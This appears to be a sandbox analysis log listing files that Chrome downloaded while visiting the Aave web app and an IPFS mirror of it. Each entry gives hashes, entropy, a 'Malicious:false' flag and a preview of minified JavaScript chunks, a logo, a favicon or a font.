                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:MS Windows icon resource - 1 icon, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):7796
                                                                                                                                                                                                                                                  Entropy (8bit):7.8453773692006825
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:vi5DEcWihLh3y7h8+wPHgOcaOWPv8UaxjJuz9N9v:wy8xxaxlsf9v
                                                                                                                                                                                                                                                  MD5:9871E69B95BECCFFF5B48E42B0622F6A
                                                                                                                                                                                                                                                  SHA1:1A939C9602A3F18876132656476DFACF0A157830
                                                                                                                                                                                                                                                  SHA-256:946D87D92B748DF7666682FE022AF7231C8AFF8120572CFE322A80AF0949CCD6
                                                                                                                                                                                                                                                  SHA-512:20F23EFC4606021E80987B8E3F291AF140146931806E831FAE6B3FAD14B7E28C50D79C10831614AD3058FDF4CD47E580B6E17B2D5C32A3D176C434AC7A9C41F6
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/favicon.ico
                                                                                                                                                                                                                                                  Preview:............ .^........PNG........IHDR.............\r.f....orNT..w.....IDATx.....U..+;...^^..^/i:$!aq......P4,"(.......|:.2.....@.Q..E......T..T.d.....d.s..}u_.;.~..T...}......n.{...q...................................................................................................................................................8.-[.x...."......n".w..O.....?......N...x.........7....-.w.F..............L.....$.dg.mbG..O!.E.I....KI^K....H. 9.....IN%9.......N..s.|.A.3^..L...,.......#?.,(...6A.'.1.G.=.'.<...*....H...2.kIn#....$O.<G.".+M..3...y...k.w..g8.d5Io..........>Z4..\...p>......N..=$..#...WIn$y..I...cb.Z^"yZ..FyV~..Hv..2=..9..+..;...P.P~..n.d.3I...(...$w.<.l.7cA<...J9j.@2.G..5...R...Ju..64.g.)....$.<D.B.'.X.?..r.8K.7L.aA..?.E...p.X.:.O.av.}..w.d.eA.O...;....?.R..Q..Nz:..j......'..$.<...I.#..$g..N. .|%|l.pL.Z.6.v../.'.!..&u....MrU.W....*....+WB.A..<..y.lG..q._..c.\.......B.j..Y...C."h'....~l.[..\..$..<.I.......}%6..g...!......(V,..W::.kH.>......27y...$.
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (15744), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):15744
                                                                                                                                                                                                                                                  Entropy (8bit):5.248482024601397
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:eWdEOWhlahl+PSaq3qAdzTpw5Ur664iCCw79AyIxLsu9qWZkuJsb6:MbS733pTqjPiCC69mLeW
                                                                                                                                                                                                                                                  MD5:33A79C9556F37933B9CB90566F1D1AD1
                                                                                                                                                                                                                                                  SHA1:8020F6502557AFC541179470FFD04E3FBEB7D0B0
                                                                                                                                                                                                                                                  SHA-256:15276E68799F7F3BAF8CDB0E61517941ED276E81DEDF0D4F5FB4A31F8549D004
                                                                                                                                                                                                                                                  SHA-512:A5981F6B139D05D14B2C73B8B01B635BCE2A2DED7CE212CAE78A22D0192299468DDF3CB20055FAF8BEA4311BB3D13242ECDCCE4AD6B744FB71CC28A2A849A9C2
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7603],{57333:function(t,e,r){var o=r(67294);function n(){}function a(t){return!!(t||"").match(/\d/)}function i(t){return null===t||void 0===t}function s(t){return t.replace(/[-[\]/{}()*+?.\\^$|]/g,"\\$&")}function u(t,e){void 0===e&&(e=!0);var r="-"===t[0],o=r&&e,n=(t=t.replace("-","")).split(".");return{beforeDecimal:n[0],afterDecimal:n[1]||"",hasNagation:r,addNegation:o}}function l(t,e,r){for(var o="",n=r?"0":"",a=0;a<=e-1;a++)o+=t[a]||n;return o}function p(t,e){return Array(e+1).join(t)}function c(t,e){if(t.value=t.value,null!==t){if(t.createTextRange){var r=t.createTextRange();return r.move("character",e),r.select(),!0}return t.selectionStart||0===t.selectionStart?(t.focus(),t.setSelectionRange(e,e),!0):(t.focus(),!1)}}function f(t,e,r){return Math.min(Math.max(t,e),r)}function h(t){return Math.max(t.selectionStart,t.selectionEnd)}var m={displayType:"input",decimalSeparator:".",thousandsGroupStyle:"thousand",fixe
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (17583), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):17583
                                                                                                                                                                                                                                                  Entropy (8bit):5.541378089136963
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:nqPQ7VeiHZenoFOT0R1n4sRI7OzFNJfmYOsOZZaZKEOVyX8:M8VecZUq5I7OzYTZZaZRX8
                                                                                                                                                                                                                                                  MD5:34A9A96546638961144AA957EA260F3B
                                                                                                                                                                                                                                                  SHA1:799464E1F5A0D8AA6D139119FD11E155B510EAF1
                                                                                                                                                                                                                                                  SHA-256:F10B7374B39B705FC05315D31EB04330ED755E0F1E54E04864A07016B4498509
                                                                                                                                                                                                                                                  SHA-512:4CD7A27FD271C6932CEFD8F7360517A86679C6D0A33FF5F89E2126397A491D83B147E65784756B224DEDE289A5C8FB25BBC6A9385B7B808B27B3315FBBBB62DC
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/7888.cef2f62e0e233dfc.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7888],{47130:function(e,t,r){r.d(t,{X:function(){return c}});var n=r(30120),o=r(90149),i=(r(67294),r(46839)),s=r(38776),a=r(85893),c=function(e){var t=e.children,r=(0,i.HT)(),c=r.user;return r.loading?(0,a.jsx)(n.Z,{sx:{width:"100%",display:"flex",alignItems:"center",justifyContent:"center"},children:(0,a.jsx)(o.Z,{})}):((0,s.Z)(c,"User data loaded but no user found"),(0,a.jsx)(a.Fragment,{children:t(c)}))}},29002:function(e,t,r){r.d(t,{o:function(){return u}});var n=r(59499),o=r(4730),i=r(81645),s=r(85893),a=["sx"];function c(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function l(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?c(Object(r),!0).forEach((function(t){(0,n.Z)(e,t,r[t])})):Object.getOwnPropertyDescriptors?
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (57581), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):57581
                                                                                                                                                                                                                                                  Entropy (8bit):5.523920669998129
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:EB0a6rMdLk3UVrj8D2Rx4Xi5EbcgLA78VecZUy2CIOzPt+UfYpc6Bp6:gmgdLkEV/Ci5EIg9eDy2Cjz3+6
                                                                                                                                                                                                                                                  MD5:1CAB257613BC5411E41F4FC15DAB2BA3
                                                                                                                                                                                                                                                  SHA1:D35BD54DB683BC5C8C9F1E1AFFB9884EE34ACD1F
                                                                                                                                                                                                                                                  SHA-256:2D5EEAB1079F32931000655533AEE2BC2DE3997C9E32AC66BBC60D4A1DE46340
                                                                                                                                                                                                                                                  SHA-512:9EA16E7D75E015E38D9A7420B538D5963982178642ABEA7E63E5AE0F3286D2EAB19BB25508AF73D06C5AE706DDB06B3519C05638F556FB499EACA13376BA4132
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/pages/reserve-overview-9124a4eaac07e2b6.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8219,6504],{96471:function(e,n,t){"use strict";var r=t(64836);n.Z=void 0;var o=r(t(64938)),i=t(85893),s=(0,o.default)((0,i.jsx)("path",{d:"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.41L7.83 13H20v-2z"}),"ArrowBackOutlined");n.Z=s},89722:function(e,n,t){"use strict";t.d(n,{Z:function(){return b}});var r=t(87462),o=t(63366),i=t(67294),s=t(86010),a=t(94780),l=t(81719),c=t(78884),d=t(36622),u=t(34867);function x(e){return(0,u.Z)("MuiIcon",e)}(0,t(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var m=t(85893);const h=["baseClassName","className","color","component","fontSize"],p=(0,l.ZP)("span",{name:"MuiIcon",slot:"Root",overridesResolver:(e,n)=>{const{ownerState:t}=e;return[n.root,"inherit"!==t.color&&n[`color${(0,d.Z)(t.color)}`],n[`fontSize${(0,d.Z)(t.fontSize)}`]]}})((({theme:e,ownerState:n})=>({userSelect:"n
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):1539
                                                                                                                                                                                                                                                  Entropy (8bit):4.428516830349932
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:d/tgAQX0DURLzMDLw8zUBenQ3CQqUB1JimiZCmfwFvSNu:dILz27UBerUBTimiAmfEvX
                                                                                                                                                                                                                                                  MD5:43BD7162F501C198761C91E5B66AFCC9
                                                                                                                                                                                                                                                  SHA1:88E64A60ACA36599AC33C6D3E336B891925CB5EF
                                                                                                                                                                                                                                                  SHA-256:E82105DE6E30BC72DE5DC35335354346C7452A71D8E9029BD160376FAE01A5B7
                                                                                                                                                                                                                                                  SHA-512:73C470CEE93EA08E7CA55FCC46F0A7C38A013F7F08C01560DFC9AF6F6D52492C35E8682E9424E0B5B89C52ADAD472088C79EF668F96F90516C23B33668E1E51A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/aave-com-logo-header.svg
                                                                                                                                                                                                                                                  Preview:<svg width="145" height="24" viewBox="0 0 145 24" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M132.194 19.069c-3.091 0-5.838-2.24-6.546-5.332h18.353s.099-1.12.099-1.517c0-6.563-5.34-11.904-11.903-11.904-6.563 0-11.903 5.34-11.903 11.904 0 6.565 5.31 11.78 11.903 11.78 6.593 0 10.443-4.857 11.404-8.373h-5.595s-1.779 3.442-5.812 3.442Zm.003-13.824c2.964 0 5.537 1.958 6.418 4.875h-12.836c.878-2.917 3.452-4.875 6.418-4.875ZM62.16 24c-6.563 0-11.711-5.284-11.711-11.78 0-6.495 5.34-11.904 11.903-11.904 6.563 0 11.902 5.55 11.902 11.841V23.41h-4.62v-3.755l-.337-.089C68.483 21.561 65.535 24 62.159 24h.001Zm.192-18.755c-3.707 0-6.724 3.112-6.724 6.939 0 3.826 3.016 6.886 6.724 6.886s6.723-3.089 6.723-6.886c0-3.798-3.016-6.939-6.723-6.939ZM87.441 24c-6.563 0-11.711-5.284-11.711-11.78C75.73 5.725 81.07.316 87.633.316c6.563 0 11.903 5.55 11.903 11.841V23.41h-4.622v-3.755l-.336-.089C93.764 21.561 90.816 24 87.44 24h.001Zm.192-18.755c-3.707 0-6.724 3.112-6.724 6.939 0 3.826 3.016 6.886 6
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (7679)
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):7728
                                                                                                                                                                                                                                                  Entropy (8bit):5.087323529198084
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:wgSRVk6Wg8lh4Nrviiv1aWPRkDhTt9qwqSBtxCMNMRV0IBSAMD9C+m+rmxARJx3t:RSRVmriLDPRkxtRJxNMRV0IZdSL9ilfA
                                                                                                                                                                                                                                                  MD5:1C6B9D0AD743762986197AE0E81874C1
                                                                                                                                                                                                                                                  SHA1:EABACE4131BA74B108FC891EA843B4F85B218808
                                                                                                                                                                                                                                                  SHA-256:2D739091F602476FCF261435B48A1FAFCE2533564FFF0549D27B47E341B4DCBF
                                                                                                                                                                                                                                                  SHA-512:74FDE9F8997087BB107ED5DDC3A4A37BD24793CAAD605FBDCDD54E9D18AF8F44D0C0E92FB2259AA936BD1B20D5537441EF39D9A7F066323911436184B0138111
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["75492"],{849146:function(t,e,n){var r=function(){if("undefined"!=typeof Map)return Map;function t(t,e){var n=-1;return t.some(function(t,r){return t[0]===e&&(n=r,!0)}),n}return function(){function e(){this.__entries__=[]}return Object.defineProperty(e.prototype,"size",{get:function(){return this.__entries__.length},enumerable:!0,configurable:!0}),e.prototype.get=function(e){var n=t(this.__entries__,e),r=this.__entries__[n];return r&&r[1]},e.prototype.set=function(e,n){var r=t(this.__entries__,e);~r?this.__entries__[r][1]=n:this.__entries__.push([e,n])},e.prototype.delete=function(e){var n=this.__entries__,r=t(n,e);~r&&n.splice(r,1)},e.prototype.has=function(e){return!!~t(this.__entries__,e)},e.prototype.clear=function(){this.__entries__.splice(0)},e.prototype.forEach=function(t,e){void 0===e&&(e=null);for(var n=0,r=this.__entries__;n<r.length;n++){var i=r[n];t.call(e,i[1],i[0])}},e}()}(),i="undefined"!
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (16085), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):16085
                                                                                                                                                                                                                                                  Entropy (8bit):5.328541584389771
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:EfoHj7Xoup0SgduzGt0JL2F5nbAtuOR0eT2RL69e:m27gduySYF5nbxZ69e
                                                                                                                                                                                                                                                  MD5:0C18A13DD5CC5991EE3AD74282D6D9E7
                                                                                                                                                                                                                                                  SHA1:75E30ED288D2F6FE75A7AD6F3A7AE007BAE01AE3
                                                                                                                                                                                                                                                  SHA-256:F2DDEEA7B0DC7C8FDD5F5C3F4EE5B0E0C4FB8A70E17C5AC0E129885B418DC6D0
                                                                                                                                                                                                                                                  SHA-512:091D98673C0F154C9FD4573823331EA4D4BFA0D34897FD9CF9836B3B032042289EE5AB44DABD22F8FF73EA03CA05ADD0292ED7531540C790239B6746342D05A8
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/5315-d41068d7bd9e64db.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5315],{68682:function(e,n,t){t.d(n,{MB:function(){return A},ET:function(){return S},n2:function(){return k}});var r=t(1279),i=t(80059),o=t(30120),c=t(29630),s=t(81645),a=t(67294),l=t(49338),u=t(78371),d=t(57609),p=t(97563),x=t(41024),f=t(72667),j=t(59499),y=t(49501),v=t(92391),m=t(85893);function b(e,n){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);n&&(r=r.filter((function(n){return Object.getOwnPropertyDescriptor(e,n).enumerable}))),t.push.apply(t,r)}return t}function h(e){for(var n=1;n<arguments.length;n++){var t=null!=arguments[n]?arguments[n]:{};n%2?b(Object(t),!0).forEach((function(n){(0,j.Z)(e,n,t[n])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(t)):b(Object(t)).forEach((function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(t,n))}))}return e}var g={aEthLidoWETH:{tokenIconSymbol:"WETH",symbol:"aWETH",a
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (15040), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):15040
                                                                                                                                                                                                                                                  Entropy (8bit):5.398852019740805
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:4yPmUvEg+TA73Ctp7SeUVCv0e6uE4PtPcYprx4BzZ9w:4yPjvt4AGXUVCY4FPcYpr6BI
                                                                                                                                                                                                                                                  MD5:919356EBBBFC9BBECDA1BA9D68325866
                                                                                                                                                                                                                                                  SHA1:B329797D5D79E77FE2D61AE61630747D32538F7A
                                                                                                                                                                                                                                                  SHA-256:7063EB6CEFC6BE0C188A4E799A1F53CFEABD759872909B72651948D970ED41CA
                                                                                                                                                                                                                                                  SHA-512:0ECD20C7D6648220D760989EF1D354E30E50FD47AE61A1BC2DFBAADCDE961D1DB9EA677A9E9C9A2B8D9A90CC402813C872378F885563FD6A648E3A864452549F
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/9189.3b39e44e1e1f285d.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9189],{62753:function(e,n,t){var r=t(64836);n.Z=void 0;var o=r(t(64938)),i=t(85893),s=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");n.Z=s},89722:function(e,n,t){t.d(n,{Z:function(){return x}});var r=t(87462),o=t(63366),i=t(67294),s=t(86010),a=t(94780),c=t(81719),l=t(78884),d=t(36622),u=t(34867);function p(e){return(0,u.Z)("MuiIcon",e)}(0,t(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var f=t(85893);const m=["baseClassName","classNa
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 98868, version 1.0
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):98868
                                                                                                                                                                                                                                                  Entropy (8bit):7.997348664849209
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:1536:kWKd1QBjcSqfPdRBUJEW8yB7F2W4Ob2RdFoEw1r4FM9OcU/0UDTTj:m10zEWfB7GObYof1r5icUH
                                                                                                                                                                                                                                                  MD5:DC131113894217B5031000575D9DE002
                                                                                                                                                                                                                                                  SHA1:F96348260751EA78B1D23E9557DB297290BDAF28
                                                                                                                                                                                                                                                  SHA-256:D612F1212B452AF07F1A5DEFB2B672E76A91F7139E7499FA48BB9B2B985C22D6
                                                                                                                                                                                                                                                  SHA-512:0AA4420C7B7DCC70238371F9D21D521D0673CAF4C1883EEB2D3254C5A1DAD941F4569F418350FFC61E93303466C504179B90BA0ACF008250DC9C2C6DDF6F850B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/media/Inter-Regular.f1f0c35b.woff2
                                                                                                                                                                                                                                                  Preview:wOF2.......4..........................................F...J.`..........9..T..6.$..N. ..r...-[....Jl..\Z 8...B.J.....9..m..nN...g....?^.AD!.......J.u.YW.s..)..[.J.<...............o$.....}.y#/!a.....(.2.V.X.G.j$...!d1/:.P.U..(.C..1.3...,.G..Y.'..\....$s....Y...h.........C}...yE|.e.k..WK.b[U.P].b.P..J&U.......o...9..p...2...N#....)..U,..".=..q[...S..E...U..U...`......r.Vx...T.*K.."j....q....R\......1.J9w..H]<..w..A..\o..:./...U..n.G..S...>...Z3.....&4.z.......^...d..J}L.U].-?...z..M.(.u.t.v.......['...iNP..VP..3.....{D...((l...^.....=..P...=.'....ry..aa....\ba.m.#.^...d..p.|.g.l...e..o.CB..k..2:....b,.".......=a.5.l./..............@../y...<..w1.C.(imM9...jW..L`...~...a....#....8.....(.Xg.t.9...s...m.H.?.x.v...v.....z'k6.?..y~.c%....>..[%S...(..k.{....+......)s.=.....!.+...7C.../..G/.....!X:...6+-..,<...&..4.....^.S...E>|Gi0....?.?^..r.M..E...3FT.&;..9....<..Sw-:..f.z9.}=Kn......"&...8...^s.mf.B..9...oh.O...2...lj|.#.U.H'...{.`..X.....e .AZ...T...
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (10134), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):10134
                                                                                                                                                                                                                                                  Entropy (8bit):5.3248676773482275
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:w7g8F82kZbk9/obvQw++1R5j3FvtWU/98iqcjJLmLLx5pOsYU3hJo:w7GbbkxyzLR3FvN/6ojJGbYsL4
                                                                                                                                                                                                                                                  MD5:294B8F234E5006980C29F7309DF45D75
                                                                                                                                                                                                                                                  SHA1:FE4B0BE3402F3F26499D388F52F9FBD041D18D06
                                                                                                                                                                                                                                                  SHA-256:BA9F3DFF2E49BAF1CB2BAEB27C495A08630C569B3B0C1BD71DAE366574C2E37C
                                                                                                                                                                                                                                                  SHA-512:B071E5FC210E35015E3C86AA10FD547C2797425F0C0B54E7810CE934C9F14A7A0820E4E8EFA5BBFCA5C77B6B0CF0DE664DA3852C7FC623E5FD80B202BE9577FD
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/82-c4138125c2feb6d3.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[82],{833:function(e,t,r){r.r(t),r.d(t,{BigNumber:function(){return n.O$},formatFixed:function(){return o.S5},FixedFormat:function(){return o.xO},FixedNumber:function(){return o.xs},parseFixed:function(){return o.Ox},_base16To36:function(){return n.t2},_base36To16:function(){return n.g$}});var n=r(2593),o=r(20335)},78435:function(e,t,r){r.r(t),r.d(t,{logger:function(){return n.k},Wordlist:function(){return n.D},wordlists:function(){return o.E}});var n=r(48812),o=r(10234)},89722:function(e,t,r){r.d(t,{Z:function(){return h}});var n=r(87462),o=r(63366),i=r(67294),s=r(86010),a=r(94780),c=r(81719),l=r(78884),u=r(36622),d=r(34867);function f(e){return(0,d.Z)("MuiIcon",e)}(0,r(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var p=r(85893);const m=["baseClassName","className","color","component","fontSiz
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (40795), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):40795
                                                                                                                                                                                                                                                  Entropy (8bit):5.4272205188788405
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:bBgnCjXusvADIIJX++52yT+N0s0Q0ckifweOVXCCIOzvN1SmVT:bBeCjXuGiI0EIQ0ZiIyCjzeYT
                                                                                                                                                                                                                                                  MD5:7625BE13B32F68FD6296AFC64C72EF2C
                                                                                                                                                                                                                                                  SHA1:D9C524DFEA3DBD92239CB0C59D123B676516BC60
                                                                                                                                                                                                                                                  SHA-256:A77551B9AA3F965A856F8E39217F40FE8D8AC3BD27DD8FA9B362DADFF8B4CB1A
                                                                                                                                                                                                                                                  SHA-512:E4430B7EC05C2E6B824A703A6D306C180DD014F4F1417F95D753732202F6ED66C933C9C5C2D305F20F7BEF103425415BDAAAE4AC8D3706B04BF6E1ABF3295E6D
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/pages/governance-0757370cd87e1b88.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4345],{84110:function(e){e.exports=function(){"use strict";return function(e,t,r){e=e||{};var n=t.prototype,o={future:"in %s",past:"%s ago",s:"a few seconds",m:"a minute",mm:"%d minutes",h:"an hour",hh:"%d hours",d:"a day",dd:"%d days",M:"a month",MM:"%d months",y:"a year",yy:"%d years"};function s(e,t,r,o){return n.fromToBase(e,t,r,o)}r.en.relativeTime=o,n.fromToBase=function(t,n,s,i,a){for(var l,c,d,u=s.$locale().relativeTime||o,p=e.thresholds||[{l:"s",r:44,d:"second"},{l:"m",r:89},{l:"mm",r:44,d:"minute"},{l:"h",r:89},{l:"hh",r:21,d:"hour"},{l:"d",r:35},{l:"dd",r:25,d:"day"},{l:"M",r:45},{l:"MM",r:10,d:"month"},{l:"y",r:17},{l:"yy",d:"year"}],h=p.length,x=0;x<h;x+=1){var f=p[x];f.d&&(l=i?r(t).diff(s,f.d,!0):s.diff(t,f.d,!0));var v=(e.rounding||Math.round)(Math.abs(l));if(d=l>0,v<=f.r||!f.r){v<=1&&x>0&&(f=p[x-1]);var g=u[f.l];a&&(v=a(""+v)),c="string"==typeof g?g.replace("%d",v):g(v,n,f.l,d);break}}if(n)return c;var m=d?u.futur
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):379473
                                                                                                                                                                                                                                                  Entropy (8bit):5.5060736443916785
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:x+EQG4J/uhbzIYzgXJl4YYmeu9p0E3xHiHBvnR7cW/6p9wkxcKT4D2nGa0idEsn8:x14whbzIrl6hvnR7cWicknTg270fDa6z
                                                                                                                                                                                                                                                  MD5:9CB0E86CFDA35472FA6009492CB300B7
                                                                                                                                                                                                                                                  SHA1:0012A92D13ADB1F1BA164BCBC5904A2A72CB18D1
                                                                                                                                                                                                                                                  SHA-256:EAD78DFBDFF281D7FED47E998E6F0673A34ABED6F2B9B2E6DD923B7E08F7398F
                                                                                                                                                                                                                                                  SHA-512:52C52A3010CB79813E9D456EC565F12418FCDC98E1BA13F8342872D53549DE46C97E98EFB04F444396373F2B7DB453A979DDF40B531615D51BA33AEE612ACB2A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
